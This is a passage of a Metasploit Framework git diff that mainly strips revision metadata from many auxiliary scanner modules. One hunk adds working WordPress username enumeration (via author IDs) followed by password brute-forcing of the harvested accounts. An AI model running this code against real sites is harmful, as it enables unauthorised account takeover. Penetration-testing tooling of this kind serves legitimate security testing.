a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb index e65f8e3838..8d9196efde 100644 --- a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb +++ b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. @@ -37,7 +33,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Troy Rose ', 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.osisecurity.com.au/advisories/' ], diff --git a/modules/auxiliary/scanner/http/ssl.rb b/modules/auxiliary/scanner/http/ssl.rb index f6910626fb..da51bf377f 100644 --- a/modules/auxiliary/scanner/http/ssl.rb +++ b/modules/auxiliary/scanner/http/ssl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP SSL Certificate Information', - 'Version' => '$Revision$', 'Description' => 'Parse the server SSL certificate to obtain the common name and signature algorithm', 'Author' => [ diff --git a/modules/auxiliary/scanner/http/svn_scanner.rb b/modules/auxiliary/scanner/http/svn_scanner.rb index 3d530ce18a..65370ea458 100644 --- a/modules/auxiliary/scanner/http/svn_scanner.rb +++ b/modules/auxiliary/scanner/http/svn_scanner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP Subversion Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect subversion directories and files and analize its content. Only SVN Version > 7 supported', 'Author' => ['et'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index 6c4097850b..fbfc1c6f99 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb +++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Apache Tomcat User Enumeration', - 'Version' => '$Revision$', 'Description' => %q{ Apache Tomcat user enumeration utility, for Apache Tomcat servers prior to version 6.0.20, 5.5.28, and 4.1.40. diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index aab3629812..fb6978cdea 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb +++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Tomcat Application Manager Login Utility', - 'Version' => '$Revision$', 'Description' => 'This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass.', 'References' => [ diff --git a/modules/auxiliary/scanner/http/trace.rb b/modules/auxiliary/scanner/http/trace.rb index 55c31af0dd..bdafbb01db 100644 --- a/modules/auxiliary/scanner/http/trace.rb +++ b/modules/auxiliary/scanner/http/trace.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP TRACE Detection', - 'Version' => '$Revision$', 'Description' => 'Test if TRACE is actually enabled. 405 (Apache) 501(IIS) if its disabled, 200 if it is', 'Author' => ['CG'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/trace_axd.rb b/modules/auxiliary/scanner/http/trace_axd.rb index 2925a46505..bcf15c8e93 100644 --- a/modules/auxiliary/scanner/http/trace_axd.rb +++ b/modules/auxiliary/scanner/http/trace_axd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP trace.axd Content Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect trace.axd files and analize its content', 'Author' => ['c4an'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/verb_auth_bypass.rb b/modules/auxiliary/scanner/http/verb_auth_bypass.rb index 7d1e1dc37f..e2de4014d0 100644 --- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,8 +27,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'et [at] metasploit.com' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/vhost_scanner.rb b/modules/auxiliary/scanner/http/vhost_scanner.rb index 246faadc6e..76e0617f69 100644 --- a/modules/auxiliary/scanner/http/vhost_scanner.rb +++ b/modules/auxiliary/scanner/http/vhost_scanner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,8 +32,7 @@ require 'cgi' }, 'Author' => [ 'et [at] cyberspace.org' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb b/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb index 19a3c08d8d..99eebecee0 100644 --- a/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb +++ b/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMware Server Directory Traversal Vulnerability', - 'Version' => '$Revision$', 'Description' => 'This modules exploits the VMware Server Directory Traversal vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5 @@ -31,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary the gueststealer tool.', 'Author' => 'CG' , 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2009-0015.html' ], diff --git a/modules/auxiliary/scanner/http/web_vulndb.rb b/modules/auxiliary/scanner/http/web_vulndb.rb index 0fbb20fb4d..7682ea0268 100644 --- a/modules/auxiliary/scanner/http/web_vulndb.rb +++ b/modules/auxiliary/scanner/http/web_vulndb.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary This module identifies common vulnerable files or cgis. }, 'Author' => [ 'et' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/webdav_internal_ip.rb b/modules/auxiliary/scanner/http/webdav_internal_ip.rb index cd7ebb7de7..597e8190b4 100644 --- a/modules/auxiliary/scanner/http/webdav_internal_ip.rb +++ b/modules/auxiliary/scanner/http/webdav_internal_ip.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP WebDAV Internal IP Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect webservers internal IPs though WebDAV', 'Author' => ['et'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/webdav_scanner.rb b/modules/auxiliary/scanner/http/webdav_scanner.rb index 9d1deacf9a..9fc6cb2476 100644 --- a/modules/auxiliary/scanner/http/webdav_scanner.rb +++ b/modules/auxiliary/scanner/http/webdav_scanner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP WebDAV Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect webservers with WebDAV enabled', 'Author' => ['et'], 'License' => MSF_LICENSE @@ -57,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary wdtype = 'SHAREPOINT DAV' end - print_status("#{target_host} (#{tserver}) has #{wdtype} ENABLED") + print_good("#{target_host} (#{tserver}) has #{wdtype} ENABLED") report_note( { diff --git a/modules/auxiliary/scanner/http/webdav_website_content.rb b/modules/auxiliary/scanner/http/webdav_website_content.rb index 568414908b..08676d37ab 100644 --- a/modules/auxiliary/scanner/http/webdav_website_content.rb +++ b/modules/auxiliary/scanner/http/webdav_website_content.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP WebDAV Website Content Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect webservers disclosing its content though WebDAV', 'Author' => ['et'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/wordpress_login_enum.rb b/modules/auxiliary/scanner/http/wordpress_login_enum.rb index 68f741db3f..85fd043d2b 100644 --- a/modules/auxiliary/scanner/http/wordpress_login_enum.rb +++ b/modules/auxiliary/scanner/http/wordpress_login_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -9,7 +5,6 @@ # http://metasploit.com/ ## - class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -20,18 +15,19 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'Wordpress Brute Force and User Enumeration Utility', - 'Version' => '$Revision$', - 'Description' => 'Wordpress Authentication Brute Force and User Enumeration Utility', - 'Author' => [ - 'Alligator Security Team', - 'Tiago Ferreira ' - ], + 'Name' => 'Wordpress Brute Force and User Enumeration Utility', + 'Description' => 'Wordpress Authentication Brute Force and User Enumeration Utility', + 'Author' => + [ + 'Alligator Security Team', + 'Tiago Ferreira ', + 'Zach Grace ' + ], 'References' => [ ['BID', '35581'], ['CVE', '2009-2335'], - ['OSVDB', '55713'], + ['OSVDB', '55713'] ], 'License' => MSF_LICENSE ) @@ -39,8 +35,11 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('URI', [false, 'Define the path to the wp-login.php file', '/wp-login.php']), - OptBool.new('VALIDATE_USERS', [ true, "Enumerate usernames", true ]), + OptBool.new('VALIDATE_USERS', [ true, "Validate usernames", true ]), OptBool.new('BRUTEFORCE', [ true, "Perform brute force authentication", true ]), + OptBool.new('ENUMERATE_USERNAMES', [ true, "Enumerate usernames", true ]), + OptString.new('RANGE_START', [false, 'First user id to enumerate', '1']), + OptString.new('RANGE_END', [false, 'Last user id to enumerate', '10']) ], self.class) end @@ -51,6 +50,11 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) + usernames = [] + if datastore['ENUMERATE_USERNAMES'] + usernames = enum_usernames + end + if datastore['VALIDATE_USERS'] @users_found = {} vprint_status("#{target_url} - WordPress Enumeration - Running User Enumeration") @@ -68,17 +72,29 @@ class Metasploit3 < Msf::Auxiliary if datastore['VALIDATE_USERS'] if @users_found && @users_found.keys.size > 0 vprint_status("#{target_url} - WordPress Brute Force - Skipping all but #{uf = @users_found.keys.size} valid #{uf == 1 ? "user" : "users"}") - else - vprint_status("#{target_url} - WordPress Brute Force - No valid users found. Exiting.") - return end end + + # Brute-force using files. each_user_pass { |user, pass| if datastore['VALIDATE_USERS'] next unless @users_found[user] end - do_login(user, pass) + + do_login(user, pass) } + + # Brute force previously found users + if not usernames.empty? + print_status("#{target_url} - Brute-forcing previously found accounts...") + passwords = load_password_vars(datastore['PASS_FILE']) + usernames.each do |user| + passwords.each do |pass| + do_login(user, pass) + end + end + end + end end @@ -181,4 +197,44 @@ class Metasploit3 < Msf::Auxiliary rescue ::Timeout::Error, ::Errno::EPIPE end end + + def enum_usernames + usernames = [] + for i in datastore['RANGE_START']..datastore['RANGE_END'] + uri = "#{datastore['URI'].gsub(/wp-login/, 'index')}?author=#{i}" + print_status "#{target_url} - Requesting #{uri}" + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri + }) + + if (res and res.code == 301) + uri = URI(res.headers['Location']) + uri = "#{uri.path}?#{uri.query}" + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri + }) + end + + if res.nil? + print_error("#{target_url} - Error getting response.") + elsif res.code == 200 and res.body =~ /href="http[s]*:\/\/.*\/\?*author.+title="([[:print:]]+)" /i + username = $1 + print_good "#{target_url} - Found user '#{username}' with id #{i.to_s}" + usernames << username + elsif res.code == 404 + print_status "#{target_url} - No user with id #{i.to_s} found" + else + print_error "#{target_url} - Unknown error. HTTP #{res.code.to_s}" + end + end + + if not usernames.empty? + p = store_loot('wordpress.users', 'text/plain', rhost, usernames * "\n", "#{rhost}_wordpress_users.txt") + print_status("#{target_url} - Usernames stored in: #{p}") + end + + return usernames + end end diff --git a/modules/auxiliary/scanner/http/xpath.rb b/modules/auxiliary/scanner/http/xpath.rb index 81e7c75515..a5f23da17e 100644 --- a/modules/auxiliary/scanner/http/xpath.rb +++ b/modules/auxiliary/scanner/http/xpath.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary This module exploits blind XPATH 1.0 injections over HTTP GET requests. }, 'Author' => [ 'et [at] metasploit . com' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/imap/imap_version.rb b/modules/auxiliary/scanner/imap/imap_version.rb index b3de6171cd..7c62b4ca6a 100644 --- a/modules/auxiliary/scanner/imap/imap_version.rb +++ b/modules/auxiliary/scanner/imap/imap_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'IMAP4 Banner Grabber', - 'Version' => '$Revision$', 'Description' => 'IMAP4 Banner Grabber', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/ip/ipidseq.rb b/modules/auxiliary/scanner/ip/ipidseq.rb index b707128ffc..03e5aa94f5 100644 --- a/modules/auxiliary/scanner/ip/ipidseq.rb +++ b/modules/auxiliary/scanner/ip/ipidseq.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,8 +31,7 @@ class Metasploit3 < Msf::Auxiliary classified as "Incremental" or "Broken little-endian incremental". }, 'Author' => 'kris katterjohn', - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE ) register_options([ diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb index 9fb1bebbdd..8f4925b0da 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Lotus Domino Password Hash Collector', - 'Version' => '$Revision$', 'Description' => 'Get users passwords hashes from names.nsf page', 'Author' => 'Tiago Ferreira ', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb index b62af0c634..769d271791 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Lotus Domino Brute Force Utility', - 'Version' => '$Revision$', 'Description' => 'Lotus Domino Authentication Brute Force Utility', 'Author' => 'Tiago Ferreira ', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb index 7eb0476ea5..e41069737e 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Lotus Domino Version', - 'Version' => '$Revision$', 'Description' => 'Several checks to determine Lotus Domino Server Version.', 'Author' => ['CG'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb index f02715358f..6c980bbeb1 100644 --- a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb +++ b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary and implementation of the InterBase server from InterBase Services Manager. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/auxiliary/scanner/misc/java_rmi_server.rb b/modules/auxiliary/scanner/misc/java_rmi_server.rb index c5c7c0b936..ac632652e6 100644 --- a/modules/auxiliary/scanner/misc/java_rmi_server.rb +++ b/modules/auxiliary/scanner/misc/java_rmi_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Java RMI Server Insecure Endpoint Code Execution Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect Java RMI endpoints', 'Author' => ['mihi', 'hdm'], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/misc/redis_server.rb b/modules/auxiliary/scanner/misc/redis_server.rb index 6d41cd5374..6437aa5f4a 100644 --- a/modules/auxiliary/scanner/misc/redis_server.rb +++ b/modules/auxiliary/scanner/misc/redis_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info={}) super(update_info(info, 'Name' => 'Redis-server Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module scans for Redis server. By default Redis has no auth. If auth (password only) is used, it is then possible to execute a brute force attack on diff --git a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb index 11507e867a..c2d6a49c64 100644 --- a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb +++ b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Rosewill RXS-3211 IP Camera Password Retriever', - 'Version' => '$Revision$', 'Description' => %q{ This module takes advantage of a protocol design issue with the Rosewill admin executable in order to retrieve passwords, allowing remote attackers to take diff --git a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb index a608e03297..7732e03cf6 100644 --- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb +++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary program entries and their running port numbers. }, 'Author' => [''], - 'Version' => '$Revision$', 'References' => [ ['URL', 'http://www.ietf.org/rfc/rfc1057.txt'], diff --git a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb index 89953a2aee..d0d0c489a0 100644 --- a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb +++ b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => ['MC'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'DisclosureDate' => 'Sep 25 2009' )) diff --git a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb index 0b49f9b85c..a07f5418c2 100644 --- a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'MSSQL Password Hashdump', - 'Version' => '$Revision$', 'Description' => %Q{ This module extracts the usernames and encrypted password hashes from a MSSQL server and stores them for later cracking. diff --git a/modules/auxiliary/scanner/mssql/mssql_login.rb b/modules/auxiliary/scanner/mssql/mssql_login.rb index 462685ac2b..0016810eb1 100644 --- a/modules/auxiliary/scanner/mssql/mssql_login.rb +++ b/modules/auxiliary/scanner/mssql/mssql_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'MSSQL Login Utility', - 'Version' => '$Revision$', 'Description' => 'This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).', 'Author' => 'MC', 'References' => diff --git a/modules/auxiliary/scanner/mssql/mssql_ping.rb b/modules/auxiliary/scanner/mssql/mssql_ping.rb index d8c3d06194..d541980f1e 100644 --- a/modules/auxiliary/scanner/mssql/mssql_ping.rb +++ b/modules/auxiliary/scanner/mssql/mssql_ping.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'MSSQL Ping Utility', - 'Version' => '$Revision$', 'Description' => 'This module simply queries the MSSQL instance for information.', 'Author' => 'MC', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb index 5096044c48..a63a7bc73a 100644 --- a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb index 142ef2350d..77bc86879a 100644 --- a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'MySQL Authentication Bypass Password Dump', - 'Version' => '$Revision$', 'Description' => %Q{ This module exploits a password bypass vulnerability in MySQL in order to extract the usernames and encrypted password hashes from a MySQL server. diff --git a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb index f9782c9b9e..229cbafdc7 100644 --- a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'MYSQL Password Hashdump', - 'Version' => '$Revision$', 'Description' => %Q{ This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking. diff --git a/modules/auxiliary/scanner/mysql/mysql_login.rb b/modules/auxiliary/scanner/mysql/mysql_login.rb index df31b12700..a39de92313 100644 --- a/modules/auxiliary/scanner/mysql/mysql_login.rb +++ b/modules/auxiliary/scanner/mysql/mysql_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,8 +26,7 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ [ 'CVE', '1999-0502'] # Weak password - ], - 'Version' => '$Revision$' + ] )) end diff --git a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb index 1a15a2bb30..27627da977 100644 --- a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'MYSQL Schema Dump', - 'Version' => '$Revision$', 'Description' => %Q{ This module extracts the schema information from a MySQL DB server. diff --git a/modules/auxiliary/scanner/mysql/mysql_version.rb b/modules/auxiliary/scanner/mysql/mysql_version.rb index 8ba017177e..033c134151 100644 --- a/modules/auxiliary/scanner/mysql/mysql_version.rb +++ b/modules/auxiliary/scanner/mysql/mysql_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ Enumerates the version of MySQL servers }, - 'Version' => '$Revision$', 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/netbios/nbname.rb b/modules/auxiliary/scanner/netbios/nbname.rb index d965b74e2d..ecfc066a04 100644 --- a/modules/auxiliary/scanner/netbios/nbname.rb +++ b/modules/auxiliary/scanner/netbios/nbname.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'NetBIOS Information Discovery', - 'Version' => '$Revision$', 'Description' => 'Discover host information through NetBIOS', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/netbios/nbname_probe.rb b/modules/auxiliary/scanner/netbios/nbname_probe.rb index 84680d406e..5e52d6dc7f 100644 --- a/modules/auxiliary/scanner/netbios/nbname_probe.rb +++ b/modules/auxiliary/scanner/netbios/nbname_probe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'NetBIOS Information Discovery Prober', - 'Version' => '$Revision$', 'Description' => 'Discover host information using sequential NetBIOS Probes', 'Author' => ['hdm', 'todb'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/nfs/nfsmount.rb b/modules/auxiliary/scanner/nfs/nfsmount.rb index d5265eebea..1de98fba25 100644 --- a/modules/auxiliary/scanner/nfs/nfsmount.rb +++ b/modules/auxiliary/scanner/nfs/nfsmount.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the 